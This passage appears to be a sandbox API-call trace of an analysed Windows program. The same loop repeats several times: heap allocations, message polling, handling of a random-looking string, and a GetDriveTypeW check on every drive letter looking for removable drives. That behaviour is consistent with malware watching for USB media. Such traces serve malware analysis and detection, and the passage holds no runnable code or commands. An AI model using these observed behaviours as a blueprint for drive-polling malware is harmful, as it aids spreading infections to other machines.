hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.864] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0213.864] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0213.864] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.864] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0213.864] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0213.864] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0213.864] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0213.864] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0213.864] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0213.864] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0213.864] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.864] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0213.864] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0213.864] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0213.864] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0213.865] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0213.865] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0213.865] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0213.865] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0213.865] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0213.865] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0213.865] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0213.865] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0213.865] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0213.865] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0213.865] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0213.865] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0213.865] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0213.866] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0213.866] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0213.866] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0213.866] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0213.866] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0213.866] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0213.866] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0213.867] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0213.867] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0213.867] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0213.867] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0213.867] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0213.868] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0213.868] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0213.868] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0213.868] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0213.868] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0213.868] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0213.868] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0213.869] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0213.869] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0213.869] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0213.869] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0213.869] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0213.869] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0213.869] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0213.869] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0213.869] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0213.869] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0213.869] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0213.869] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0213.869] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0213.869] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0213.869] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.869] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0213.870] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0213.870] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0213.870] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f20 [0213.870] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0213.870] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0213.870] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0213.870] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0213.870] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f20 | out: hHeap=0x12c0000) returned 1 [0213.870] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0213.870] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0213.870] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e540 [0213.870] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.931] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e540 | out: hHeap=0x12c0000) returned 1 [0213.931] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.931] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0213.931] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0213.931] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0213.931] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0213.931] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0213.932] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0213.932] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0213.932] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0213.932] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0213.932] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.932] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0213.932] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0213.932] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.932] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0213.932] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0213.932] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0213.932] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0213.932] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0213.932] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0213.932] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0213.932] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.932] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0213.932] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0213.932] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0213.932] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0213.932] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0213.932] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0213.932] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0213.932] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0213.932] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0213.932] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0213.932] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0213.932] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0213.933] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0213.933] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0213.933] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0213.933] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0213.933] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0213.933] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0213.934] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0213.934] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0213.934] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0213.934] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0213.934] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0213.934] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0213.934] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0213.935] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0213.935] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0213.935] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0213.935] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0213.935] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0213.935] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0213.936] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0213.936] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0213.936] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0213.936] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0213.937] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0213.937] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0213.937] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0213.938] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0213.938] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0213.938] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0213.938] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0213.938] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0213.938] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0213.938] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0213.938] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0213.938] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0213.939] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0213.939] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0213.939] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0213.939] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.939] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0213.939] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0213.939] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0213.939] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325de0 [0213.939] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0213.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0213.939] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0213.939] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0213.939] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325de0 | out: hHeap=0x12c0000) returned 1 [0213.939] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0213.939] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0213.939] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0213.939] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.939] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0213.939] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.939] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0213.940] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0213.940] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0213.940] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0213.940] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0213.940] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0213.940] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0213.940] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0213.940] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0213.940] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.940] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0213.940] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0213.940] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.940] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7e0 [0213.940] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0213.940] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0213.940] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0213.940] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0213.940] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0213.940] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0213.940] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.940] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0213.940] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0213.940] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0213.940] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0213.940] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0213.940] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0213.940] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0213.940] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0213.940] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0213.940] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0213.941] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0213.941] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0213.941] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0213.941] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0213.941] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0213.941] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0213.941] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0213.941] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0213.942] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0213.942] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0213.942] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0213.942] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0213.942] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0213.942] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0213.942] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0213.943] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0213.943] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0213.943] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0213.943] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0213.944] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0213.944] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0213.944] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0213.944] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0213.944] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0213.944] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0213.944] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0213.945] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0213.945] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0213.945] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0213.945] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0213.945] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0213.945] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0213.945] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0213.945] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0213.945] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0213.945] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0213.945] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0213.945] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0213.945] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0213.945] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0213.945] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.945] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0213.945] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0213.945] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0213.945] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326000 [0213.945] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0213.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0213.945] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0213.946] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0213.946] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326000 | out: hHeap=0x12c0000) returned 1 [0213.946] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0213.946] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0213.946] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0213.946] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.946] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0213.946] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.946] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0213.946] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0213.946] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0213.946] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0213.946] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0213.946] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0213.946] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0213.946] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | 